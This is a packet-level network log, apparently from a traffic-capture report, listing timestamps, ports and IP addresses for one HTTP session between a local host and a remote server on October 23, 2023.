Oct 23, 2023 20:39:41.891064882 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:41.891089916 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:41.891150951 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:41.891170025 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:41.891170025 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:41.891226053 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:41.891336918 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:41.891336918 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.284961939 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285057068 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285115004 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285182953 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285226107 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.285226107 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.285237074 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285290956 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.285291910 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285357952 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285401106 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.285414934 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285471916 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285531044 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.285535097 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285531044 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.285592079 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285634995 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.285634995 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.285646915 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285722017 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285744905 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.285746098 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.285779953 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285835028 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285898924 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.285904884 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.285906076 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.285953045 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.286006927 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.286072016 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.286072969 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.286132097 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.286190987 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.679733992 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.679826975 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.679883957 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.679949045 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.680031061 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.680110931 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.680147886 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.681277037 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.681363106 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.681422949 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.681473970 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.681482077 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.681540966 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.681595087 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.681627989 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.681652069 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.681706905 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.681710958 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.681767941 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.681822062 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.681828022 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.681885958 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.681889057 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.681940079 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.681998968 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.681998968 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.682003975 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.682060003 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.682100058 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.682115078 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.682164907 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.682178020 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.682229996 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
Oct 23, 2023 20:39:42.682235956 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.682290077 CEST | 80 | 50036 | 77.238.121.250 | 192.168.11.20
Oct 23, 2023 20:39:42.682297945 CEST | 50036 | 80 | 192.168.11.20 | 77.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682349920 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682349920 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682442904 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682451963 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682502031 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682565928 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682617903 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682658911 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682676077 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682723999 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682729959 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682773113 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682782888 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682828903 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682838917 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682876110 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682897091 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.682966948 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683013916 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683013916 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683070898 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683115005 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683135986 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683199883 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683218002 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683254004 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683290005 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.683442116 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.072293997 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.072380066 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.072438002 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.072572947 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.072572947 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.072572947 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073220968 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073312998 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073369980 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073402882 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073434114 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073462963 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073489904 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073566914 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.073677063 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.074238062 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.074335098 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.074445009 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.074501991 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076277971 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076358080 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076416969 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076474905 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076534986 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076534986 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076596975 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.076714993 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.077541113 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.077794075 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078016043 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078100920 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078159094 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078217030 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078228951 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078275919 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078288078 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078330040 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078377962 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078387022 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078425884 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078452110 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078479052 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078510046 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078572035 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078627110 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078679085 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078733921 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078741074 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078795910 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078845978 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078851938 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.078912973 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079051971 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079056978 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079114914 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079166889 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079169035 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079224110 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079286098 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079340935 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079392910 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079482079 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079540968 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079557896 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079607010 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079659939 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079687119 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079713106 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079751015 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079775095 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079794884 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079829931 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079885960 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079931021 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.079941988 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475001097 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475033998 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475090981 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475156069 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475172043 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475215912 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475215912 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475316048 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475342989 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475495100 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475567102 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475622892 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475683928 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475713968 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475790977 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.475840092 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476178885 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476258039 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476341009 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476434946 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476464987 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476499081 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476588964 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476651907 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476666927 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476731062 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476785898 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476807117 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476882935 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476891994 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476933002 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.476998091 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477042913 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477056980 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477117062 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477145910 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477197886 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477210999 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477287054 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477287054 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477341890 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477365971 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477397919 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477454901 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477456093 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477505922 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477508068 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477560997 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477565050 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477608919 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477623940 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477657080 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477679014 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477716923 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477735996 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477822065 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477885962 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477937937 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.477993965 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478043079 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478049994 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478163958 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478166103 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478166103 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478221893 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478316069 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478369951 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478427887 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478492022 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478544950 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478591919 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478609085 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478650093 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478662968 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478688955 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478717089 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478768110 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478779078 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478816032 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478833914 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478864908 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478936911 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.478988886 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479055882 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479166031 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479213953 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479270935 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479317904 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479419947 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479464054 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479527950 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479582071 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479614973 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479644060 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479680061 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479697943 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479751110 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479784012 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479813099 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479865074 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:43.479899883 CEST5003680192.168.11.2077.238.121.250
